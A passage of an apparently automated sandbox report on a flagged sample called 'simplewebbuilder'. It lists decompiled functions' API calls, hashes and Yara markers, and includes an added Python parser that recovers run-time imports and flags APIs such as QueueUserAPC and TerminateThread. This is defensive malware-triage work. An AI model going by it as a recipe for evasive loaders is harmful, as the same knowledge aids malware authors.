  • Part of subcall function 009C24D0: SetEvent.KERNEL32(00000000,009C1D2E,?,?), ref: 009C2527
• OpenEventA.KERNEL32(00100002,00000000,00000000,C05FB8F7), ref: 009C1CB0
• CloseHandle.KERNEL32(00000000), ref: 009C1CC5
• ResetEvent.KERNEL32(00000000,C05FB8F7), ref: 009C1CCF
• CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C1D04
• __CxxThrowException@8.LIBCMT ref: 009C1D35
  • Part of subcall function 009C4B5A: RaiseException.KERNEL32(?,?,009C0155,?,?,?,?,?,?,?,009C0155,?,009E1F98,?), ref: 009C4BAF
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C05FB8F7), ref: 009C1D7A
• CloseHandle.KERNEL32(00000000), ref: 009C1D8F
  • Part of subcall function 009C2210: GetCurrentProcessId.KERNEL32(?), ref: 009C2269
• WaitForSingleObject.KERNEL32(00000000,000000FF,C05FB8F7), ref: 009C1D9F
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
• String ID:
• API String ID: 2227236058-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 009C6394
                                                                                                                              • Part of subcall function 009C8B02: RtlEncodePointer.NTDLL(00000000), ref: 009C8B05
                                                                                                                              • Part of subcall function 009C8B02: __initp_misc_winsig.LIBCMT ref: 009C8B20
                                                                                                                              • Part of subcall function 009C8B02: GetModuleHandleW.KERNEL32(kernel32.dll,?,009E2598,00000008,00000003,009E1F7C,?,00000001), ref: 009C9881
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009C9895
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009C98A8
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009C98BB
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009C98CE
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009C98E1
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009C98F4
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009C9907
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009C991A
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009C992D
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009C9940
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009C9953
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009C9966
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009C9979
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009C998C
                                                                                                                              • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009C999F
                                                                                                                            • __mtinitlocks.LIBCMT ref: 009C6399
                                                                                                                            • __mtterm.LIBCMT ref: 009C63A2
                                                                                                                              • Part of subcall function 009C640A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 009C8F38
                                                                                                                              • Part of subcall function 009C640A: _free.LIBCMT ref: 009C8F3F
                                                                                                                              • Part of subcall function 009C640A: RtlDeleteCriticalSection.NTDLL(009E4978), ref: 009C8F61
                                                                                                                            • __calloc_crt.LIBCMT ref: 009C63C7
                                                                                                                            • __initptd.LIBCMT ref: 009C63E9
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009C63F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: ce53f3648ebdcc035d7d75cb8041f7071dbd826047d42e930ef33b059dde8a74
                                                                                                                            • Instruction ID: 72ae807468aced1b7c2492436b24170d8fd750a47581bbb05d917f21bc3cb661
                                                                                                                            • Opcode Fuzzy Hash: ce53f3648ebdcc035d7d75cb8041f7071dbd826047d42e930ef33b059dde8a74
                                                                                                                            • Instruction Fuzzy Hash: A9F06232D2D7715AE6287B757C4AF5A37889B81774B20461EF460D50E2FF1188425156
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,009C3A73,00000000), ref: 009C3ADB
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009C3AE2
                                                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 009C3AEE
                                                                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 009C3B0B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                            • String ID: RoInitialize$combase.dll
                                                                                                                            • API String ID: 3489934621-340411864
                                                                                                                            • Opcode ID: 07bc1ea63976c0a0b92e00e903a9cdbaea054898834b758d15e93f6c3dc1609d
                                                                                                                            • Instruction ID: e88e60aaa9f0b84f31d6c888d745a376c05d59aba863293b6eb091edfbb00abd
                                                                                                                            • Opcode Fuzzy Hash: 07bc1ea63976c0a0b92e00e903a9cdbaea054898834b758d15e93f6c3dc1609d
                                                                                                                            • Instruction Fuzzy Hash: 24E06DB05FC381AEDB206FB0EC4AF433754A740706F008025B545D41E0CBB08888AB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009C3AB0), ref: 009C3BB0
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009C3BB7
                                                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 009C3BC2
                                                                                                                            • RtlDecodePointer.NTDLL(009C3AB0), ref: 009C3BDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                                            • Opcode ID: e4f294e6ce8ea0ebc0ec2f6b59221b0d60f42af2acf62b15fecfabc4af77d7ea
                                                                                                                            • Instruction ID: b53fc20934515e5caa3882f559fb07afdc7b274a08c6a3de1fffe792ab396e55
                                                                                                                            • Opcode Fuzzy Hash: e4f294e6ce8ea0ebc0ec2f6b59221b0d60f42af2acf62b15fecfabc4af77d7ea
                                                                                                                            • Instruction Fuzzy Hash: C5E01AB05ED300EFDB102FE0BC4EF123764B700746F008466B240A46A0CB704A45EA11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • TlsGetValue.KERNEL32(00000026,C05FB8F7,?,?,?,?,00000000,009D70B8,000000FF,009C27CA), ref: 009C256A
                                                                                                                            • TlsSetValue.KERNEL32(00000026,009C27CA,?,?,00000000), ref: 009C25D7
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009C2601
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009C2604
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapValue$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1812714009-0
                                                                                                                            • Opcode ID: 1af42585b12ff746f2541bc59d9cf615307ee92e4939ca499f1c65033c77d5d4
                                                                                                                            • Instruction ID: 7d35e72e3acfee6db876ab2bec8a619e2b5080421bee49ce92317b68dfe11fa4
                                                                                                                            • Opcode Fuzzy Hash: 1af42585b12ff746f2541bc59d9cf615307ee92e4939ca499f1c65033c77d5d4
                                                                                                                            • Instruction Fuzzy Hash: 2451C0719043449FD720DF29C944F16BBE8FB89764F05855EF85897291DB30EC00CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 009D5D90
                                                                                                                            • __FindPESection.LIBCMT ref: 009D5DAA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 876702719-0
                                                                                                                            • Opcode ID: fb3152e5f30700ee4ddfc738babe8b8a694d8d70970856648d8e3fc8174182e7
                                                                                                                            • Instruction ID: 1047f52ef0f46a48520ec19d84865fcf5766ce6f1bb5095d3db09703742765ef
                                                                                                                            • Opcode Fuzzy Hash: fb3152e5f30700ee4ddfc738babe8b8a694d8d70970856648d8e3fc8174182e7
                                                                                                                            • Instruction Fuzzy Hash: 4CA1B471A50B559FCB10CF68D9807ADB7A9FB44710F1AC52AE809EB391E731ED01CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009B1CB1
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009B1CBA
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(009E8284,00000000), ref: 009B1CC6
                                                                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 009B1CD4
                                                                                                                            • QueueUserAPC.KERNEL32(009B1E7C,?,00000000), ref: 009B1CE1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009B1CEC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1946104331-0
                                                                                                                            • Opcode ID: 57192d71fa53276640a5b14c82bbac32727c03e19ed1af56f5c622a235600bb5
                                                                                                                            • Instruction ID: 11f2a0e7eee4ed225d8885f5272cf718f00d4d4fa9036102a9874fc828504183
                                                                                                                            • Opcode Fuzzy Hash: 57192d71fa53276640a5b14c82bbac32727c03e19ed1af56f5c622a235600bb5
                                                                                                                            • Instruction Fuzzy Hash: 62F0AF31195604BFCB204F96DD0DCDBBFBCEB85720700421EF56A921A1DF70A844DB20
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
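The function listings above (the __init_pointers block with its GetProcAddress(…,FlsAlloc…) subcalls, the two LoadLibraryExW(combase.dll,…) blocks, and the WaitForMultipleObjects/TerminateThread/QueueUserAPC block) are the report's view of each recovered function's calls. What a triager usually wants out of them is the set of imports a function binds at run time, because those never appear in the PE import table. Note also that Joe Sandbox prints stack slots beyond an API's documented parameter count: GetModuleHandleW is shown with eight arguments and LoadLibraryExW with seven, so the "RoInitialize" after LoadLibraryExW's three real parameters is a leftover stack value (the name the following GetProcAddress will look up), not a LoadLibraryExW argument. The following Python parser is an added example, not part of the Joe Sandbox report or its tooling: it parses these "APIs" bullets, recovers resolved export names and loaded DLLs, separates trailing stack strings from real parameters, and attaches simple triage notes. The sample input is constructed from lines on this page; the parameter-count table and the triage notes are the example's own assumptions.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox text report and recover
what each function resolves at run time (absent from the PE import table)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: "APIs" lines copied from the function listings on this page.
SAMPLE = """\
APIs
• __init_pointers.LIBCMT ref: 009C6394
  • Part of subcall function 009C8B02: RtlEncodePointer.NTDLL(00000000), ref: 009C8B05
  • Part of subcall function 009C8B02: GetModuleHandleW.KERNEL32(kernel32.dll,?,009E2598,00000008,00000003,009E1F7C,?,00000001), ref: 009C9881
  • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009C9895
  • Part of subcall function 009C8B02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009C98F4
• GetCurrentThreadId.KERNEL32 ref: 009C63F0
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,009C3A73,00000000), ref: 009C3ADB
• GetProcAddress.KERNEL32(00000000), ref: 009C3AE2
• RtlEncodePointer.NTDLL(00000000), ref: 009C3AEE
APIs
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009B1CB1
• TerminateThread.KERNEL32(?,00000000), ref: 009B1CD4
• QueueUserAPC.KERNEL32(009B1E7C,?,00000000), ref: 009B1CE1
"""

# One bullet: optional "Part of subcall function X:", Name.MODULE, optional
# "(args)", then "ref: ADDR". Names may contain ':' (std::...) or '@' (...@8).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
HEX_RE = re.compile(r"[0-9A-F]{8}")

# Documented parameter counts (assumed table; extend as needed). The sandbox prints
# stack slots past this count, so anything beyond it is a leftover, not an argument.
PARAM_COUNT = {"LoadLibraryExW": 3, "LoadLibraryW": 1, "GetModuleHandleW": 1,
               "GetProcAddress": 2, "QueueUserAPC": 3}
# Heuristic triage notes for APIs worth a second look in a listing (assumed).
NOTES = {"QueueUserAPC": "APC queued into a thread; check whose handle is used",
         "TerminateThread": "thread killed without cleanup",
         "GetProcAddress": "imports resolved at run time"}

@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address on "Part of subcall function" lines

Block = List[Call]  # all calls listed under one "APIs" header

def parse_listing(text: str) -> List[Block]:
    """Start a new block at each "APIs" header and parse its bullets into Calls."""
    blocks: List[Block] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
        elif blocks and (m := CALL_RE.match(line)):
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            blocks[-1].append(Call(m.group("name"), m.group("module"), args,
                                   m.group("ref"), m.group("sub")))
    return blocks

def is_symbolic(arg: str) -> bool:
    """A slot the sandbox rendered as text rather than as a raw dword or '?'."""
    return arg not in ("", "?") and HEX_RE.fullmatch(arg) is None

def resolved_imports(block: Block) -> List[str]:
    """Export names passed to GetProcAddress by the function or its subcalls."""
    return [c.args[1] for c in block
            if c.name == "GetProcAddress" and len(c.args) > 1 and is_symbolic(c.args[1])]

def loaded_libraries(block: Block) -> List[str]:
    """DLL names handed to LoadLibrary*/GetModuleHandle* as the first argument."""
    return [c.args[0] for c in block
            if c.name.startswith(("LoadLibrary", "GetModuleHandle"))
            and c.args and c.args[0].lower().endswith(".dll")]

def trailing_strings(block: Block) -> List[str]:
    """String slots past the documented parameter count, e.g. 'RoInitialize' after
    LoadLibraryExW's three real parameters: the name the next GetProcAddress uses."""
    out: List[str] = []
    for c in block:
        n = PARAM_COUNT.get(c.name)
        if n is not None:
            out.extend(a for a in c.args[n:] if is_symbolic(a))
    return out

def triage_flags(block: Block) -> Dict[str, str]:
    """APIs in the block that appear in NOTES, with the note; GetProcAddress only
    counts when at least one resolved name is visible."""
    flags = {c.name: NOTES[c.name] for c in block if c.name in NOTES}
    if "GetProcAddress" in flags and not resolved_imports(block):
        del flags["GetProcAddress"]
    return flags
```

Run it over the "APIs" sections of a saved report text (for example `for b in parse_listing(open("report.txt").read()): print(resolved_imports(b), trailing_strings(b))`) to get a per-function list of run-time bound imports. On the sample, the first block yields FlsAlloc and CreateEventExW from kernel32.dll, the second yields combase.dll with RoInitialize recovered only as a trailing stack string, and the third is flagged for TerminateThread and QueueUserAPC. The flags are prompts to read the function, not verdicts: QueueUserAPC against the process's own thread is ordinary code, so the thread handle's origin is what decides.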

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403356
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004033B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                            • API String ID: 1385375860-4131005785
                                                                                                                            • Opcode ID: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction ID: 4b08c86a7d9428a74474774e457b3a663dfcff145a9399c9a999905afefb3de6
                                                                                                                            • Opcode Fuzzy Hash: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction Fuzzy Hash: 5331287190129869EB328B705C856DA3F6C9B02709F2404FFD544FA2C2DA789F868B19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• std::exception::exception.LIBCMT ref: 009C1F7F
  • Part of subcall function 009C2AD3: std::exception::_Copy_str.LIBCMT ref: 009C2AEC
  • Part of subcall function 009C1350: __CxxThrowException@8.LIBCMT ref: 009C13AE
• std::exception::exception.LIBCMT ref: 009C1FDE
Strings
• boost unique_lock has no mutex, xrefs: 009C1F6E
• $, xrefs: 009C1FE3
• boost unique_lock owns already the mutex, xrefs: 009C1FCD
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
• String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
• API String ID: 2140441600-46888669
• Opcode ID: 5f829ad7903671adbff06b8c8cc9094aae7d235ea2952f7aaab4e181403eaa95
• Instruction ID: 412e20a9ddcc863a0570d0efaaffaaccd91e58df75c74ca69ad40549b83089ef
• Opcode Fuzzy Hash: 5f829ad7903671adbff06b8c8cc9094aae7d235ea2952f7aaab4e181403eaa95
• Instruction Fuzzy Hash: 4921E8718083849FD720DF24C445B5BBBE4BB89708F54491EF5A587381D7B9D808CB97
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd_noexit.LIBCMT ref: 009C5083
  • Part of subcall function 009C6272: GetLastError.KERNEL32(75920A60,7591F550,009C6460,009C3633,7591F550,?,009B6181,00000104,75920A60,7591F550,00434B50,?,?,?,?,009B6B02), ref: 009C6274
  • Part of subcall function 009C6272: __calloc_crt.LIBCMT ref: 009C6295
  • Part of subcall function 009C6272: __initptd.LIBCMT ref: 009C62B7
  • Part of subcall function 009C6272: GetCurrentThreadId.KERNEL32 ref: 009C62BE
  • Part of subcall function 009C6272: SetLastError.KERNEL32(00000000,009B6181,00000104,75920A60,7591F550,00434B50,?,?,?,?,009B6B02), ref: 009C62D6
• __calloc_crt.LIBCMT ref: 009C50A6
• __get_sys_err_msg.LIBCMT ref: 009C50C4
• __invoke_watson.LIBCMT ref: 009C50E1
Strings
• Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 009C508E, 009C50B4
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
• String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
• API String ID: 109275364-798102604
• Opcode ID: 417e4bae19f5958c97ff963176c050424cd9f71f6699062fc000e380c57a4b7c
• Instruction ID: 2b87bf3b4c08348d47b585dbafe685dbaacfaa12337f00aed67f69e32c26b018
• Opcode Fuzzy Hash: 417e4bae19f5958c97ff963176c050424cd9f71f6699062fc000e380c57a4b7c
• Instruction Fuzzy Hash: 23F0BB31D45F1457EB31B5155C41F6B729CDB817A0B12042EFE4CD6241DA21AC8042D7
Uniqueness
Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 009B2350
• InterlockedExchange.KERNEL32(?,00000001), ref: 009B2360
• PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B2370
• GetLastError.KERNEL32 ref: 009B237A
  • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
Strings
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
• String ID: pqcs
• API String ID: 1619523792-2559862021
• Opcode ID: 636d4755937d6ddabb6f879d45bed91f5840d893e0c0fbb91bf89230da00010b
• Instruction ID: 944b865a2e5b3f74e0110a96292207d214baa40eb0fbf6259e9493a946f82534
• Opcode Fuzzy Hash: 636d4755937d6ddabb6f879d45bed91f5840d893e0c0fbb91bf89230da00010b
• Instruction Fuzzy Hash: 18F0BE30945304AFDB20AFB4DD09FEB7BECEB40701B00892AF906C3101EB70D8489791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009B4035
• GetProcessHeap.KERNEL32(00000000,?), ref: 009B4042
• RtlAllocateHeap.NTDLL(00000000), ref: 009B4049
• std::exception::exception.LIBCMT ref: 009B4063
  • Part of subcall function 009BACC0: __EH_prolog.LIBCMT ref: 009BACC5
  • Part of subcall function 009BACC0: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009BACD4
  • Part of subcall function 009BACC0: __CxxThrowException@8.LIBCMT ref: 009BACF3
Strings
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
• String ID: bad allocation
• API String ID: 3112922283-2104205924
• Opcode ID: 5a57e866486a05c600b94b6c5cd32af3d46a82ef85c3e459a595e9eccde089b3
• Instruction ID: bb590d29177981436bb994b83bf781e80a048bce9d3aaecac58c05168721f367
• Opcode Fuzzy Hash: 5a57e866486a05c600b94b6c5cd32af3d46a82ef85c3e459a595e9eccde089b3
• Instruction Fuzzy Hash: 79F082B1D84309EFCB10EFE0D809BEEB778EB04341F40851AE515A2241DB745208DB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStartupInfoA.KERNEL32(?), ref: 00404F3F
• GetFileType.KERNEL32(00000800), ref: 00404FE5
• GetStdHandle.KERNEL32(-000000F6), ref: 0040503E
• GetFileType.KERNEL32(00000000), ref: 0040504C
• SetHandleCount.KERNEL32 ref: 00405083
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
• Opcode ID: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
• Instruction ID: 0a81f0dcc5ba0bfdc0506c3f5ccff14beb01dd10c6f3c9adb059a1ad3e4abaaf
• Opcode Fuzzy Hash: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
• Instruction Fuzzy Hash: B851377190460A8BD7208F38CE8476B3B90EB51724F19473EE5A2F72E1D7389845CB9D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 009C2050: CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C20A1
  • Part of subcall function 009C2050: WaitForSingleObject.KERNEL32(?,000000FF,C05FB8F7,?,?,?,?,C05FB8F7,009C2023,C05FB8F7), ref: 009C20B8
• ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009C231E
• ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009C233E
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 009C2377
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 009C23CB
• SetEvent.KERNEL32(?), ref: 009C23D2
  • Part of subcall function 009B418C: CloseHandle.KERNEL32(00000000,?,009C2305), ref: 009B41B0
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
• String ID:
• API String ID: 4166353394-0
• Opcode ID: ce8a6f612bfe5ba729f1c8d1669f871a15f0d9322a33533225ff95a3332ca7bc
• Instruction ID: bab9d64980fb177efa7d98a5f592329c153d24a5722ee5c1c8e51bd715f5ffff
• Opcode Fuzzy Hash: ce8a6f612bfe5ba729f1c8d1669f871a15f0d9322a33533225ff95a3332ca7bc
• Instruction Fuzzy Hash: F441F6709043519FEB159F28CC80B2B77A8EF45B20F14466DEC18DB296D739DC428BA6
Uniqueness
Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 009B20AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009B20CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B20D8
• InterlockedDecrement.KERNEL32(?), ref: 009B213E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B21A6
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$DecrementTimerWaitable
• String ID:
• API String ID: 1611172436-0
• Opcode ID: 25b401ee7726a50f965d33433f6a6ab639d25e1a3ef0d64bf08ad7217f893408
• Instruction ID: 1402bc47c4c366fbe1e402b702553712e4c147be4a03642f4a9be8f48fb61b9a
